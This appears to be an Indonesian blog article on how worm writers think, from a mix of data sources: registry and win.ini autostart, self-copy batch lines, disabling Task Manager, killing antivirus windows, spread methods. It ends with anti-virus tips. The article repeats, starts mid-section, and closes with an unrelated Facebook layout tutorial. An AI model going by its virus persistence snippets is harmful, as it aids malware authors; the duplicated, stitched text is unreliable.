Selain menyisipkan kode Javascript, para admin nakal tersebut juga sering
melakukan aksi penipuan dengan menyisipkan worm pada file-file yang sering
di download oleh user.
::(8)::-------:: System Restore
Dulu kemampuan System Restore inilah yang dibangga-banggakan oleh Micro$oft.
Ketika Windows mengalami Error entah karena file systemnya corrupt, maka
kita tinggal menggunakan System restore, kembali kepada restore point saat
komputer kita masih dalam keadaan baik-baik saja.
Saya memiliki sedikit pengalaman dengan Virus Brontok.C. Virus ini sangat
merepotkan karena sepertinya sang penulisnya telah memikirkan matang-
matang tentang hal-hal yang memungkinkan mempersingkat umur Worm buatannya.
Saat itu (5/04/2006) saya dipanggil ke rumah seorang teman di Surabaya.
Sebelumnya saya sudah membaca "bocoran" tentang Virus ini di http://www.vaksin.com.
Vaksin memang memberikan solusi, namun solusi itu terlalu rumit dan saya
tidak punya tools yang disarankan oleh vaksin sebagai alat bantu.
Saya berusaha membasminya secara manual dan mencari-cari cara untuk mem-
bantai worm ini. Saya sempat hampir menyerah sebelum pada akhirnya saya
teringat sesuatu.. yaitu system restore. Beruntung sekali Brontok tidak
mengincar System Restore sehingga saya bisa menjalankan System Restore
tanpa masalah. Setelah System Restore terbuka, segera saya pilih Restore
point saat komputer belum terinfeksi. Dan Sukses!! hehehe.. brontok musnah
dalam sekejap!! Tinggal bersih-bersih "mayatnya" ajah.... :P
::(9)::-------:: Pertahanan diri terhadap aplikasi pembasmi worm dan aplikasi
lain yang membahayakan.
Aplikasi yang membahayakan disini adalah yang membahakan bagi kelangsungan
hidup sang virus. VX jelas mempertibangkan hal ini. Meskipun semua fasilitas
default seperti msconfig, regedit, taskmanager, msdos sudah dikunci, namun
di internet banyak sekali tools serupa yang dibuat oleh pihak ketiga.
Naah, user biasa menggunakan tools serupa ini untuk membasmi virus secara
manual. VX kini memiliki kebiasaan memprogram wormnya untuk bisa mendeteksi
Application Title dari program yang sedang berjalan. Biasanya ketika me-
nemukan Application title yang tidak diinginkan seperti mengandung kata
"Antivirus" , "Removal" , "Anti" , "Regsitry Editor" , "Untility" , "Basmi",
"Prompt" maka virus akan menghentikan proses program tersebut.
Oleh karena itulah jika anda berniat membuat suatu removal tools untuk worm
jenis tertentu, jangan gunakan Application Title yang kira-kira sudah
diperhitungkan oleh sang VX.
---// Memanfaatkan kebiasaan VX untuk mengantisipasi serangan worm karena
kelalaian user (Tips aman dari virus tanpa Antivirus).
1. Waspadai file-file asing
- Pastikan bahwa antara ekstensi file dan logo icon file yang ditampilkan
sesuai. Beberapa virus meniru icon msword dan icon file-file gambar
untuk mengelabuhi user. Bahkan ada yang meniru icon Folder seperti virus
w32/kumis.A dan Brontok misalnya.
- Jangan membuka file-file asing yang tidak kamu ketahui secara jelas asal
usulnya dan dampak bagi komputermu.
- Jangan membuka folder yang dirasa asing. Pastikan apakah folder asing
itu benar-benar folder ataukah file *.exe dan *.scr yang memakai icon
folder.
- Hati-hati terhadap file-file .vbs dan .bat yang terenkripsi. Sebelum
menjalankannya sebaiknya decrypt dulu codenya, itu jika anda mau (dan
mampu)
- Waspada terhadap file-file web seperti html, htm, php, asp dll..
Sebelum kamu membuka file-file tersebut yang kamu dapat dari Internet,
terlebih dahulu bukalah file-file tersebut dengan menggunakan notepad.
Setelah dirasa aman dari script asing, barulah buka dengan browser.
2. Periksa dan lindungi file-file system.
File-file .ini dan Autoexec.bat adalah sasaran empuk bagi virus. Kamu
bisa melindungi file-file tersebut dari perubahan dengan menggunakan aplikasi
pengaman komputer seperti FileVault (bisa kamu dapatkan di http://www.spyrozone.tk).
Filevault disamping mengamankan data-data pentingmu juga akan mengamankan
file-file system.
3. Disket, Flashdisk, CD (Media penyimpanan)
Dari hasil penelitian ternyata virus-virus yang paling meluas penyebaran-
nya adalah virus yang mampu menyebarkan dirinya melalui disket dan flash-
disk. Hal ini terjadi dikarenakan pada umumnya pengguna komputer di Indonesia
masih menggunakan disket sebagai alat penyimpanan data sementara. Jangan
langsung membuka disket dengan menggunakan Windows explorer!! Masuklah ke
A:\ melalui DOS terlebih dahulu kemudian hapuslah file Folder.htt (biasanya
beratribut Hidden). Mengapa harus menghapus folder.htt?? Karena file
folder.htt kerapkali menjadi sasaran virus untuk menyisipkan kode jahatnya.
Why?? Karena file ini akan otomatis tereksekusi saat kamu membuka suatu folder
atau drive (dikendalikan oleh file desktop.ini).
Dan yang perlu kamu ingat adalah, sebelum membuka file "APAPUN" dari
media-media penyimpanan diatas, lihat dulu properties filenya (klik-kanan
pada file kemudian pilih properties) perhatikan apakah File Type nya sama
dengan file yang kamu maksudkan dan sesuai dengan logo icon yang dipakai.
Biasanya worm akan memakai ekstensi *.exe (aplication) dan *.scr (scren
saver) dengan menggunakan icon yang menjebak. Icon yang sering disunakan
ialah icon-icon MsOffice (msword, excel, Msaccess, MsPowerPoint), notepad,
dan icon folder.
Ketika kamu menerima CD dari temanmu atau orang lain yang tidak kamu ketahui
secara pasti isinya, tekan tombol SHIFT sambil memasukkan CD kedalam CD Room
drive. Klik-kanan tombol start (sambil tetap menekan tombol shift) kemudian
pilih Explore. Jendela Windows Explorer akan terbuka lalu bukalah lokasi
CD yang ingin kamu buka. Setelah isi CD ditampilkan, barulah kamu boleh
melepas tombol SHIFT. Hal ini akan mematikan fungsi Autorun sebagai antisipasi
bila temanmu atau orang lain membuat CD jebakan yang memanfaatkan fungsi
Autorun.
4. Internet
- Jika kamu browsing di rumah, usahakan untuk tidak menggunakan Internet
Explorer. IE sangat lemah dan rentan terhadap serangan virus/worm. Gunakan
browser lain yang lebih handal misalnya Mozilla Firefox.
- Waspadalah terhadap screensaver gratisan yang banyak bertebaran di Internet
Beberapa screensaver juga sengaja dipasangi spyware oleh si pembuatnya.
Spyware adalah software mata-mata yang bisa mengirimkan laporan kegiatan
komputer satu (komputer korban) ke komputer lain (Majikan).
Gunakan saja pembasmi spyware yang sudah banyak beredar di Internet.
Waspadai juga program-program crack karena kebanyakan aplikasi tersebut
disisipi trojan oleh pembuatnya.
- Jangan browsing ke sitis-situs PORNO. Disamping karena Dosa (Zina Mata)
kebanyakan situs-situs porno menyisipkan trojan berbahaya yang akan
mencuri informasi-informasi dari komputermu. Tapi jika kamu nekat juga
"pengen" browsing ke situs-situs "ahli Neraka" tersebut, installah
DeepFreeze terlebih dahulu dan aktifkan Frozen mode.
- Jangan menggunakan MS Outlook karena kamu tentunya sudah tau sendiri
betapa lemahnya MS OUTLOOK. Gunakan gudoraMail.
5. Task Manager, MsCONFIG, StartUp, Registry
- Komputer sering hang?? Periksalah Taskmanager (ctrl+alt+del) dan lihat-
lah aplikasi apa saja yang sedang berjalan, siapa tau ada "utusan"
Virus disana. Jika ada aplikas asing, lansung ajah EndTask.
- Periksa juga MsConfig (start --> Run ketik msconfig) pada tab startup.
Hilangkan centang pada aplikasi yang tidak penting. Jika ada aplikasi
yang asing, segera hilangkan centang di kotak sebelahnya lalu masuklah
ke registry (start --> Run ketik regedit) dan hapus valuenya.
- Direktory startup (start-programs-startup) juga harus sering-sering
diperiksa karena semua file yang ada di direktory ini akan otomatis
dijalankan saat windows startup. Jika ada file asing di directory ini,
segera hapus!!
6. Trust NOBODY!!
Jangan percaya pada siapapun!!! Jangan pernah memberikan akses setingkat
dengan Administrator pada orang lain. Ingat!! Bisa saja orang lain tersebut
menyisipkan aplikasi jahat di komputermu entah dengan alasan bercanda atau
alasan lainnya.
Bagaimana?? Keenam langkah diatas cukup merepotkan bukan?? Jika kamu tidak
mau repot, ada dua alternatif yang saya sarankan:
1. Install Antivirus handal yang tidak menguras memory. Namun ingat!!!!!
sekali lagi kamu harus INGAT!! bahwa perkembangan Antivirus jauh ter-
tinggal dengan perkembangan Worm dan Virus setiap harinya. Maka dari itu
kewaspadaan tetap nomor satu!! kalaupun kamu menginstall antivirus, maka
kamu wajib untuk melakukan updating secara rutin.
Ada anggapan KELIRU yang kini mendarah-daging di masyarakat kita yaitu:
"SAYA SUDAH MENGINSTALL ANTIVIRUS TERBARU, MAKA SAYA TELAH AMAN DARI
SERANGAN WORM, VIRUS DAN TROJAN"
Anggapan ini SALAH BESAR. Yang anda butuhkan bukan Antivirus terbaru,
namun antivirus yang memiliki VIRUS DEFINITION TERBARU.
2. Jangan Pernah Membuka File-File ASING yang Tidak Kamu Ketahu Secara
Jelas Asal-Usulnya. Titik!!
Kesannya memang sedikit paranoid, tapi.. yeah apa boleh buat, daripada
nantinya kita dibuat repot, terbuang waktu dan tenaga. Bagaimanapun juga
mencegah lebih baik daripada mengobati.
---// Penutup
Well, kini anda sudah mengetahui kebiasaan-kebiasaan dan pola pikir sang
VX. Saya juga telah memberi sedikit solusi kepada anda (walaupun solusi
yang saya berikan jauh dari sempurna) supaya anda terhindar dari serangan
worm. Maka kini giliran andalah untuk WASPADA.
Ingat!!! Kejahatan dapat terjadi karena ada kesempatan. Waspadalah! Waspadalah...!!!
Sumber
>> Sudut pandang seorang VM/VX
disini kita fokuskan pada worm.
>> Bagaimana seekor worm dapat menyebar luas.
>> Kelalaian korban.
>> Memanfaatkan kebiasaan VX untuk mengantisipasi serangan worm karena
kelalaian user (Tips aman dari virus tanpa Antivirus).
Selamat menikmati..
---// Sudut Pandang Seorang VX dan bagaimana seekor worm dapat
menyebar-luas dengan memanfaatkan kelalaian user.
Mari sejenak kita masuk kedalam sudut pandang seorang Virus Writer(VX).
Pada intinya, seorang VX akan memposisikan dirinya seakan-akan dirinya
adalah sang korban. VX biasanya akan memfokuskan perhatian pada hal-hal
berikut:
::(1):: Registry.
::(2):: Ms Configuration Untility.
::(3):: File Autoexec.bat dan win.ini.
::(4):: Task Manager.
::(5):: Special Directory.
::(6):: Kloning dan Icon.
::(7):: Media penyebaran.
[+] Disket
[+] Flashdisk
[+] IRC
[+] Web page
::(8):: System Restore.
::(9):: Pertahanan diri terhadap Worm Removal Tools, Antivirus serta
aplikasi-aplikasi lain yang (dianggap) membahayakan kelangsungan
hidup worm.
Nah, sekarang mari kita kupas satu-persatu poin-poin diatas lalu kita
nikmati bersama-sama hehehe.. :P
::(1)::------------:: Registry (Start --> Run --> ketik regedit).
Registry boleh dikatakan sebagai kunci utama dan hal yang akan sangat -
sangat diperhatikan oleh user dalam pembasmian worm. Registry adalah
serangkaian konfigurasi yang dipakai windows untuk mengontrol hardware
dan software yang ter-instal pada PC. Registry dibentuk oleh dua file,
yaitu system.dat dan user.dat yang berada di direktori windows. Dua file
ini memiliki file backup yang bernama system.da0 dan user.da0.
Ada lima key utama (Handle Key) pada registry.
1. HKEY_CLASSES_ROOT (subkey dari HKEY_LOCAL_MACHINE\Software\Classes)
.::Tempat menyimpan informasi yang akan memastikan bahwa files yang anda
buka dibuka dengan aplikasi yang benar.
2. HKEY_CURRENT_USER (Subkey dari HKEY_USERS)
.::Mengandung beragam informasi tentang user (pengguna yang sedang
menggunakan Pc). Bukan cuma profil aja, tapi semua settingan kompy
masing-masing user ada disini.
3. HKEY_LOCAL_MACHINE
.::Mengandung informasi tentang setting windows secara keseluruhan bagi
seluruh pengguna PC. Setting yang dimaksud disini meliputi hardware
dan software.
4. HKEY_USERS
.::Udah jelas khan dari namanya... Yup, isi dari handle key yang satu ini
adalah data dari seluruh pengguna PC.
5. HKEY_CURRENT_CONFIG
.::Berisi info tentang profil hardware yang digunakan PC saat komputer
menyala.
Hampir seluruh aksi yang dilakukan oleh worm tidak lepas dari seputar
memodifikasi registry. Dari registry jugalah worm biasanya di set agar
otomatis hidup tatkala komputer menyala. Hal tersebut dapat dilakukan
dengan menambahkan string Value pada lokasi berikut:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
Dari registry pula sang pembuat worm biasa mendisable fasilitas-fasilitas
penting seperti diantaranya MS Dos, Task Manager (MSCONFIG.EXE), Registry
Editor(Regedit.exe), merubah Registered Owner dan Registered Organization,
serta beragam aksi menyebalkan lainnya.
Karena itulah sang VX berusaha untuk mendisable Registry Editor agar worm
buatannya tidak bisa dihentikan dengan mudah.
::(2)::--------:: MsConfigurationUntility (Start-->Run-->ketik MSCONFIG).
Dari MSCONFIG user biasa memeriksa file/aplikasi apa saja yang dijalankan
otomatis ketika windows startup. Banyak hal bisa dilakkan dengan Ms
Configuration Untility. Dari MSCONFIG user bisa menghapus daftar aplikasi
yang tidak diinginkan. Dari sini pula user bisa dengan leluasa mengedit
isi file win.ini, autoexec.bat, system.ini dan config.sys. Oleh karena
itulah VX berusaha mencegah user untuk mengakses MSCONFIG demi kelangsungan
hidup ciptaannya.
Perlu anda ketahui bahwa pada windows 2000 Microsoft tidak menyertakan
file msconfig.exe. Mungkin waktu itu para pengembangnya lagi ngantuk kali
yee.. sehingga kelupaan menyertakan file penting ini hehehe...[Garing Mode:On]
::(3)::--------:: File Autoexec.bat dan win.ini
Apa yang special dari kedua file diatas? Ya,dengan sedikit memanipulasi
isi kedua file tersebut seorang VX bisa membuat Virusnya otomatis
berjalan ketika windows booting. Kedua file diatas akan di proses ketika
startup. Ah, yang bener? Mosok seeh?? Duuh.. gak percaya yach.. ok dech..
jaman sekarang ini segalanya membutuhkan pembuktian. Jika anda pengguna
windows 98, coba anda buka file Autoexec.bat yang terletak di C:\ kemudian
periksa atributnya dulu, jika beratribut read-only, maka hilangkan centang
pada atribut itu agar anda bisa melakukan modifikasi isi file. Setelah itu
klik kanan pada file dan pilih Edit. Jendela Notepad akan terbuka dan
menampilkan isi file Autoexec.bat. Ketik script berikut:
@echo off
echo.
echo Selamat datang di komputer Gue..
echo Biar jelek begini, yang penting gw pake uang halal..
echo.
echo Sekarang tekan sembarang tombol..
echo ----------------------------------------------------
pause
Klik [file]-->[save] untuk menyimpannya. Tutup Notepad kemudian restart
komputer anda. Maka ketika windows booting pesan anda akan tampil.
Kini kita beralih ke file win.ini. File Win.ini terletak di directory
Windows berisi beberapa konfigurasi yang mengatur OS anda. Anda bisa
menjalankan file tertentu secara otomatis dengan memodifikasi isi file
win.ini. Untuk mempermudah pemahaman anda, coba tambahkan baris berikut:
[Windows]
load=c:\lokasi_program\nama_program_yang_anda_inginkan.exe
run=c:\lokasi_program\nama_program_yang_anda_inginkan.exe
Ada beberapa file lagi yang juga sama-sama diproses ketika windows
startup yaitu winstart.bat, system.ini dan config.sys namun virus kerap
kali memilih kedua file "special" yang telah saya bahas diatas.
::(4)::--------:: Task Manager (Tekan CTRL + ALT + DEL secara bersamaan).
Sesuai dengan namanya, Task Manager akan menampilkan aplikasi apa saja
yang sedang berjalan baik yang secara background atau tidak. Melalui Task
Manager kita bisa menghentikan "secara paksa" program yang tidak kita
inginkan. Sang VX menyadari benar akan hal ini, dan banyak sekali worm
yang diprogram untuk mampu mendisable Task Manager. Metodanya sendiri
bermacam-macam. Ada yang otomatis mematikan fungsi mouse ketika Task
Manager tebuka, ada pula yang langsung melakukan shutdown atau restart.
Diantaranya yang paling sering dilakukan adalah dengan perintah Taskkill,
namun cara ini tergolong kurang efektif karena perintah taskkill tidak
berjalan pada windows 9x dan ME.
::(5)::-------:: Special Directory.
Ada 2 directory special yang sudah menjadi "langganan" worm dan Virus
yaitu directory windows dan directory system. Kedua directory ini memiliki
keunikan tersendiri karena kemudahan pengesetan variabel ketika kita menulis
kode program. Saya beri contoh sederhana dalam batch programming (duuh..
dari tadi sederhana melulu.. :P mudah-mudahan anda gak bosan yach..).
Misalnya anda ingin agar Virus anda mengcopykan dirinya sendiri ke directory
windows dan directory system maka script untuk melakukan aksi copy yang
kita ketikkan ialah:
Copy %0 %windir%\virus.bat
Copy %0 %sysdir%\virus.bat
Karakter %0 berarti memerintahkan program tersebut untuk membaca dirinya
sendiri dan %windir% serta %sysdir% sudah merupakan variabel default untuk
menunjukkan directory windows dan system. Eh, mengapa scriptnya gak seperti
ini saja:
Copy %0 C:\windows\virus.bat
Copy %0 C:\windows\system\virus.bat.
Hayoo.. kalau pake perintah diatas khan sama saja?? Tidak!! Jawabannya
Tidak Sama pada kasus tertentu. Perlu anda ketahui bahwa tidak selamanya
directory Windows benama Windows, dan tidak selamanya pula directory
System bernama System. Untuk lebih jelasnya perhatikan tabel berikut:
-------------------------------------------------------------------
| Versi Windows | Nama Directory Windows | Nama Directory System |
|-----------------------------------------------------------------|
| Windows 9x, me | windows | system |
| windows 2000 | winnt | system32 |
| windows XP | windows | system32 |
-------------------------------------------------------------------
::(6)::-------:: Kloning dan Icon.
Dengan kemampuan kloning dan penggunaan icon yang "tepat" seekor worm
akan menyebar dengan sukses. Akhir-akhir ini banyak worm menggunakan
icon HTML Document, Microsoft Word Document dan icon Folder untuk me-
ngecoh user. Dan ternyata?? Banyak sekali para pengguna komputer yang
tertipu mentah-mentah! Hal ini dibuktikan dengan maraknya penyebaran
worm yang sangat meluas!! Tidak sadarkah anda bahwa penyebaran worm
yang bombastis ini tidak lain dan tidak bukan karena kecerobohan anda
sendiri?? Hehehe.. jadi kalo anda ingin mengetahui seberapa ceroboh user
di negara kita ini, tinggal kita pantau saja dari banyak tidaknya orang
yang terserang worm :P
Sebelum anda membuka dokumen apapun, pastikan dengan benar bahwa icon yang
digunakan SESUAI sengan ekstensi file yang seharusnya. Banyak user yang
lalai akan hal ini. Biasakan untuk melihat properties file terlebih
dahulu sebelum membukanya. Worm belakangan ini "gemar" memakai icon folder
dan msword namun memiliki ekstensi *.scr dan *.exe padahal kita tau bahwa
folder tidak memiliki ekstensi dan ekstensi untuk file microsoft word
adalah *.doc Ingat!! Jangan terkecoh!! waspadalah!! waspadalah!! :P
::(7)::-------:: Media penyebaran.
[+]Disket dan Flashdisk
--------------------
Tentu saja hal ini merupakan tahap yang tak kalah pentingnya. VX akan
memilih sasaran media penyipanan yang sering digunakan oleh user. Misalnya
dulu mungkin orang hanya menggunakan disket, namun seiring berkembangnya
teknologi, penggunaan FlashDisk semakin meluas. Dan bisa ditebak, banyak
pula worm kini yang mampu menggandakan dirinya kedalam FlashDisk.
-----
Email juga sangat-sangat potensial dalam penyebaran worm. Di zaman yang
serba-E ini email sekan menjadi kebutuhan pokok. Banyak sekali worm yang
memiliki SMTP sendiri untuk menyebarkan dirinya. Biasanya email seperti ini
memiliki subject yang menarik, serta isi yang menggoda user untuk membuka
attachment Virus yang disertakan.
Worm akan memeriksa address book yang ada di aplikasi mail komputer korban
kemudian mencatat seluruh daftar alamat email yang ada disana. Adakalanya
worm hanya memilih alamat email tertentu saja (secara acak) namun terkadang
juga melakukan pengiriman diri sendiri kepada seluruh alamat yang ditemukan.
[+]IRC
----
IRC sejak lama telah dimanfaatkan oleh VX dalam penyebaran worm. Biasanya
worm akan memodifikasi isi file mirc.ini sehingga nantinya worm akan aktif
di beberapa channel yang ditentukan untuk berfungsi selayaknya boot.
[+]Website
-------
Yang terakhir ini nampaknya kian marak kita temui, yaitu penyebaran melalui
web page. Biasanya admin situs yang menjadi seorang VX akan menyisipkan kode
javascript yang akan menjalankan file virus secara otomatis tanpa disadari
oleh korban (pengunjung). Admin-admin "durjana" (semoga Tuhan mengampuni
dosa-dosa mereka.. ^_^ .. ) seperti ini biasanya mengelola situs yang
"menarik" seperti penyedia crack, serial number, hacker tools dan situs-
situs p0rn0.
Selain menyisipkan kode Javascript, para admin nakal tersebut juga sering
melakukan aksi penipuan dengan menyisipkan worm pada file-file yang sering
di download oleh user.
::(8)::-------:: System Restore
Dulu kemampuan System Restore inilah yang dibangga-banggakan oleh Micro$oft.
Ketika Windows mengalami Error entah karena file systemnya corrupt, maka
kita tinggal menggunakan System restore, kembali kepada restore point saat
komputer kita masih dalam keadaan baik-baik saja.
Saya memiliki sedikit pengalaman dengan Virus Brontok.C. Virus ini sangat
merepotkan karena sepertinya sang penulisnya telah memikirkan matang-
matang tentang hal-hal yang memungkinkan mempersingkat umur Worm buatannya.
Saat itu (5/04/2006) saya dipanggil ke rumah seorang teman di Surabaya.
Sebelumnya saya sudah membaca "bocoran" tentang Virus ini di http://www.vaksin.com.
Vaksin memang memberikan solusi, namun solusi itu terlalu rumit dan saya
tidak punya tools yang disarankan oleh vaksin sebagai alat bantu.
Saya berusaha membasminya secara manual dan mencari-cari cara untuk mem-
bantai worm ini. Saya sempat hampir menyerah sebelum pada akhirnya saya
teringat sesuatu.. yaitu system restore. Beruntung sekali Brontok tidak
mengincar System Restore sehingga saya bisa menjalankan System Restore
tanpa masalah. Setelah System Restore terbuka, segera saya pilih Restore
point saat komputer belum terinfeksi. Dan Sukses!! hehehe.. brontok musnah
dalam sekejap!! Tinggal bersih-bersih "mayatnya" ajah.... :P
::(9)::-------:: Pertahanan diri terhadap aplikasi pembasmi worm dan aplikasi
lain yang membahayakan.
Aplikasi yang membahayakan disini adalah yang membahakan bagi kelangsungan
hidup sang virus. VX jelas mempertibangkan hal ini. Meskipun semua fasilitas
default seperti msconfig, regedit, taskmanager, msdos sudah dikunci, namun
di internet banyak sekali tools serupa yang dibuat oleh pihak ketiga.
Naah, user biasa menggunakan tools serupa ini untuk membasmi virus secara
manual. VX kini memiliki kebiasaan memprogram wormnya untuk bisa mendeteksi
Application Title dari program yang sedang berjalan. Biasanya ketika me-
nemukan Application title yang tidak diinginkan seperti mengandung kata
"Antivirus" , "Removal" , "Anti" , "Regsitry Editor" , "Untility" , "Basmi",
"Prompt" maka virus akan menghentikan proses program tersebut.
Oleh karena itulah jika anda berniat membuat suatu removal tools untuk worm
jenis tertentu, jangan gunakan Application Title yang kira-kira sudah
diperhitungkan oleh sang VX.
---// Memanfaatkan kebiasaan VX untuk mengantisipasi serangan worm karena
kelalaian user (Tips aman dari virus tanpa Antivirus).
1. Waspadai file-file asing
- Pastikan bahwa antara ekstensi file dan logo icon file yang ditampilkan
sesuai. Beberapa virus meniru icon msword dan icon file-file gambar
untuk mengelabuhi user. Bahkan ada yang meniru icon Folder seperti virus
w32/kumis.A dan Brontok misalnya.
- Jangan membuka file-file asing yang tidak kamu ketahui secara jelas asal
usulnya dan dampak bagi komputermu.
- Jangan membuka folder yang dirasa asing. Pastikan apakah folder asing
itu benar-benar folder ataukah file *.exe dan *.scr yang memakai icon
folder.
- Hati-hati terhadap file-file .vbs dan .bat yang terenkripsi. Sebelum
menjalankannya sebaiknya decrypt dulu codenya, itu jika anda mau (dan
mampu)
- Waspada terhadap file-file web seperti html, htm, php, asp dll..
Sebelum kamu membuka file-file tersebut yang kamu dapat dari Internet,
terlebih dahulu bukalah file-file tersebut dengan menggunakan notepad.
Setelah dirasa aman dari script asing, barulah buka dengan browser.
2. Periksa dan lindungi file-file system.
File-file .ini dan Autoexec.bat adalah sasaran empuk bagi virus. Kamu
bisa melindungi file-file tersebut dari perubahan dengan menggunakan aplikasi
pengaman komputer seperti FileVault (bisa kamu dapatkan di http://www.spyrozone.tk).
Filevault disamping mengamankan data-data pentingmu juga akan mengamankan
file-file system.
3. Disket, Flashdisk, CD (Media penyimpanan)
Dari hasil penelitian ternyata virus-virus yang paling meluas penyebaran-
nya adalah virus yang mampu menyebarkan dirinya melalui disket dan flash-
disk. Hal ini terjadi dikarenakan pada umumnya pengguna komputer di Indonesia
masih menggunakan disket sebagai alat penyimpanan data sementara. Jangan
langsung membuka disket dengan menggunakan Windows explorer!! Masuklah ke
A:\ melalui DOS terlebih dahulu kemudian hapuslah file Folder.htt (biasanya
beratribut Hidden). Mengapa harus menghapus folder.htt?? Karena file
folder.htt kerapkali menjadi sasaran virus untuk menyisipkan kode jahatnya.
Why?? Karena file ini akan otomatis tereksekusi saat kamu membuka suatu folder
atau drive (dikendalikan oleh file desktop.ini).
Dan yang perlu kamu ingat adalah, sebelum membuka file "APAPUN" dari
media-media penyimpanan diatas, lihat dulu properties filenya (klik-kanan
pada file kemudian pilih properties) perhatikan apakah File Type nya sama
dengan file yang kamu maksudkan dan sesuai dengan logo icon yang dipakai.
Biasanya worm akan memakai ekstensi *.exe (aplication) dan *.scr (scren
saver) dengan menggunakan icon yang menjebak. Icon yang sering disunakan
ialah icon-icon MsOffice (msword, excel, Msaccess, MsPowerPoint), notepad,
dan icon folder.
Ketika kamu menerima CD dari temanmu atau orang lain yang tidak kamu ketahui
secara pasti isinya, tekan tombol SHIFT sambil memasukkan CD kedalam CD Room
drive. Klik-kanan tombol start (sambil tetap menekan tombol shift) kemudian
pilih Explore. Jendela Windows Explorer akan terbuka lalu bukalah lokasi
CD yang ingin kamu buka. Setelah isi CD ditampilkan, barulah kamu boleh
melepas tombol SHIFT. Hal ini akan mematikan fungsi Autorun sebagai antisipasi
bila temanmu atau orang lain membuat CD jebakan yang memanfaatkan fungsi
Autorun.
4. Internet
- Jika kamu browsing di rumah, usahakan untuk tidak menggunakan Internet
Explorer. IE sangat lemah dan rentan terhadap serangan virus/worm. Gunakan
browser lain yang lebih handal misalnya Mozilla Firefox.
- Waspadalah terhadap screensaver gratisan yang banyak bertebaran di Internet
Beberapa screensaver juga sengaja dipasangi spyware oleh si pembuatnya.
Spyware adalah software mata-mata yang bisa mengirimkan laporan kegiatan
komputer satu (komputer korban) ke komputer lain (Majikan).
Gunakan saja pembasmi spyware yang sudah banyak beredar di Internet.
Waspadai juga program-program crack karena kebanyakan aplikasi tersebut
disisipi trojan oleh pembuatnya.
- Jangan browsing ke sitis-situs PORNO. Disamping karena Dosa (Zina Mata)
kebanyakan situs-situs porno menyisipkan trojan berbahaya yang akan
mencuri informasi-informasi dari komputermu. Tapi jika kamu nekat juga
"pengen" browsing ke situs-situs "ahli Neraka" tersebut, installah
DeepFreeze terlebih dahulu dan aktifkan Frozen mode.
- Jangan menggunakan MS Outlook karena kamu tentunya sudah tau sendiri
betapa lemahnya MS OUTLOOK. Gunakan gudoraMail.
5. Task Manager, MsCONFIG, StartUp, Registry
- Komputer sering hang?? Periksalah Taskmanager (ctrl+alt+del) dan lihat-
lah aplikasi apa saja yang sedang berjalan, siapa tau ada "utusan"
Virus disana. Jika ada aplikas asing, lansung ajah EndTask.
- Periksa juga MsConfig (start --> Run ketik msconfig) pada tab startup.
Hilangkan centang pada aplikasi yang tidak penting. Jika ada aplikasi
yang asing, segera hilangkan centang di kotak sebelahnya lalu masuklah
ke registry (start --> Run ketik regedit) dan hapus valuenya.
- Direktory startup (start-programs-startup) juga harus sering-sering
diperiksa karena semua file yang ada di direktory ini akan otomatis
dijalankan saat windows startup. Jika ada file asing di directory ini,
segera hapus!!
6. Trust NOBODY!!
Jangan percaya pada siapapun!!! Jangan pernah memberikan akses setingkat
dengan Administrator pada orang lain. Ingat!! Bisa saja orang lain tersebut
menyisipkan aplikasi jahat di komputermu entah dengan alasan bercanda atau
alasan lainnya.
Bagaimana?? Keenam langkah diatas cukup merepotkan bukan?? Jika kamu tidak
mau repot, ada dua alternatif yang saya sarankan:
1. Install Antivirus handal yang tidak menguras memory. Namun ingat!!!!!
sekali lagi kamu harus INGAT!! bahwa perkembangan Antivirus jauh ter-
tinggal dengan perkembangan Worm dan Virus setiap harinya. Maka dari itu
kewaspadaan tetap nomor satu!! kalaupun kamu menginstall antivirus, maka
kamu wajib untuk melakukan updating secara rutin.
Ada anggapan KELIRU yang kini mendarah-daging di masyarakat kita yaitu:
"SAYA SUDAH MENGINSTALL ANTIVIRUS TERBARU, MAKA SAYA TELAH AMAN DARI
SERANGAN WORM, VIRUS DAN TROJAN"
Anggapan ini SALAH BESAR. Yang anda butuhkan bukan Antivirus terbaru,
namun antivirus yang memiliki VIRUS DEFINITION TERBARU.
2. Jangan Pernah Membuka File-File ASING yang Tidak Kamu Ketahu Secara
Jelas Asal-Usulnya. Titik!!
Kesannya memang sedikit paranoid, tapi.. yeah apa boleh buat, daripada
nantinya kita dibuat repot, terbuang waktu dan tenaga. Bagaimanapun juga
mencegah lebih baik daripada mengobati.
---// Penutup
Well, kini anda sudah mengetahui kebiasaan-kebiasaan dan pola pikir sang
VX. Saya juga telah memberi sedikit solusi kepada anda (walaupun solusi
yang saya berikan jauh dari sempurna) supaya anda terhindar dari serangan
worm. Maka kini giliran andalah untuk WASPADA.
Ingat!!! Kejahatan dapat terjadi karena ada kesempatan. Waspadalah! Waspadalah...!!!
Sumber
Minggu, 30 Oktober 2011
Cara mengedit Tampilan Facebook terbaru
Langsung aja dah baca tutor nya baik baik..
n kerjain dengan kesabaran yah.. kalo ga mungkin akan jadi ribet..
nih ane kasih contoh nya FB ane yang dah ane edit.
Tutorial :
mungkin kesan pertama keliatan agak ribet sih, tapi kalo diperhatikan lagi, enak juga tampilan baru ini ^_^. Hanya saja menurut keterangannya, tampilan baru ini untuk sementara hanya dikhususkan untuk para Developer yang memiliki aplikasi di Facebook. Jadi kalo kita juga pengen punya tampilan kayak gini, berarti kita harus jadi developer juga. Yarp, kalo begitu mari kita buat aplikasi agar status kita juga sebagai developer, sehingga bisa menggunakan tampilan terbaru ini. ^_^
https://developers.facebook.com/apps
alamat diatas khusus untuk para developer yang ingin membuat aplikasi via Facebook.
- klik Create New App
- Akan muncul Pop-Up, isikan saja Nama Aplikasi yang kamu sukai :p
- klik Next. Lalu masukkan Captcha
- Setelah masuk ke halaman selanjutnya, edit sedikit informasi tentang aplikasi barumu. Gak usah ribet2, karena aplikasi ini bo'ongan ja. (kan intinya biar kita dianggap developer ;p)
- Klik Open Graph
- Setelah terbuka, sekarang masukkan saja sebuah Subject dan Object pada field yang disediakan. Lihat gambar dibawah ini sebagai contoh:
- Lalu klik Mulai.
Jika sudah, tunggu beberapa menit, lalu buka Halaman Profile kamu, dan akan ada pesan yang meminta kamu untuk Mengupdate Profile sekarang, atau nanti profile akan secara otomatis diupdate pas tanggal 30 September? Karena udah gak sabar pengen lihat hasilnya, so kita pilih Update Sekarang, lalu Halaman Profilemu akan direfresh. Setelah itu.... ta..da.. halaman profile kamu akan tampak berbeda dengan tampilan sebelumnya. ^_^
Silahkan berkreasi dengan gambar dan background disini.
